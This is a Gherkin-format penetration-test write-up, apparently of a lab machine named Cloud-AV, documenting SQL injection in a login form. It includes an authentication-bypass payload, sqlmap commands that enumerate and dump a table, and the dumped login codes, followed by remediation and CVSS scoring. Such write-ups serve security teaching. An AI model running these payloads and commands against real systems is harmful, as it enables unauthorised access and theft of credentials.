## Version 1.4.1
## language: en

Feature: SQL Injection
  TOE:
    Cloud-AV
  Category:
    Input Validation
  Location:
    http://10.10.10.2:8080
  CWE:
    CWE-89: Improper Neutralization of Special Elements used in an SQL Command
  Rule:
    REQ.173 Discard unsafe inputs
  Goal:
    Find vulnerabilities and obtain root privileges
  Recommendation:
    Sanitize inputs that may contain special characters from the SQL syntax

  Background:
  Hacker's software:
    | <Software name>      | <Version> |
    | Kali Linux           | 5.4.0     |
    | Nmap                 | 7.8.0     |
    | Firefox              | 68.6.0esr |
    | Burp Suite CE        | v2020-1   |
    | Sqlmap               | 1.4.3     |
  TOE information:
    Given that the target machine is running an online antivirus software

  Scenario: Normal use case
    Given that I use "nmap" to scan the target ports
    And I find a web server running on port 8080
    Then I visit the site using the browser
    And I find a login form asking to input a code
    When I enter a random number
    Then I get the output message
    """
    WRONG INFORMATION
    """

  Scenario: Static detection
    Given there is not access to the source code
    Then a static detection cannot be performed

  Scenario: Dynamic detection
    Given the login form I found in the server
    Then I decide to determine if a SQL injection attack is possible
    When I enter a quote as the input code
    Then I get the message
    """
    WRONG INFORMATION
    """
    And I try again, this time using a double quote as the input code
    Then I get a traceback error with the following interesting lines
    """
    sqlite3.OperationalError
    ...
    ...
    ...
    if len(c.execute('select * from code where password="' + password + '"').fetchall()) > 0:
    """
    And I realize that a SQL Injection is indeed possible


  Scenario: Exploitation
    Given the traceback error I found previously
    And that I can see exactly how the SQL statement is constructed
    Then I decide to use the following query as input code
    """
    " or "1"="1
    """
    And I get access to the AV scanner
    Then I decide to use "sqlmap" in the vulnerable form to get more information
    Given a template of the login request created using "burp"
    Then I use the following "sqlmap" command to get the DB tables
    """
    sqlmap -r post-request.txt -p password --level 3 --risk 3 --dbms sqlite --tables
    """
    And I get the following result
    """
    +------+
    | code |
    +------+
    """
    Then I decide to get the information from that table using
    """
    sqlmap -r post-request.txt -p password --level 3 --risk 3 --dbms sqlite -T code --dump
    """
    And I manage to get all the login codes
    """
    +--------------------+
    | password           |
    +--------------------+
    | myinvitecode123    |
    | mysecondinvitecode |
    | cloudavtech        |
    | mostsecurescanner  |
    +--------------------+
    """

  Scenario: Remediation
  Sanitize inputs that may contain special characters in the SQL syntax
    Given that the inputs are validated before constructing the SQL statement
    When I use the previously successful query
    """
    " or "1"="1
    """
    Then I get the message
    """
    WRONG INFORMATION
    """

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.5/10 (High) - AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.2/10 (High) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    8.9/10 (High) - CR:L/IR:L/AR:L/

  Scenario: Correlations
    No correlations have been found to this date 2020-04-07
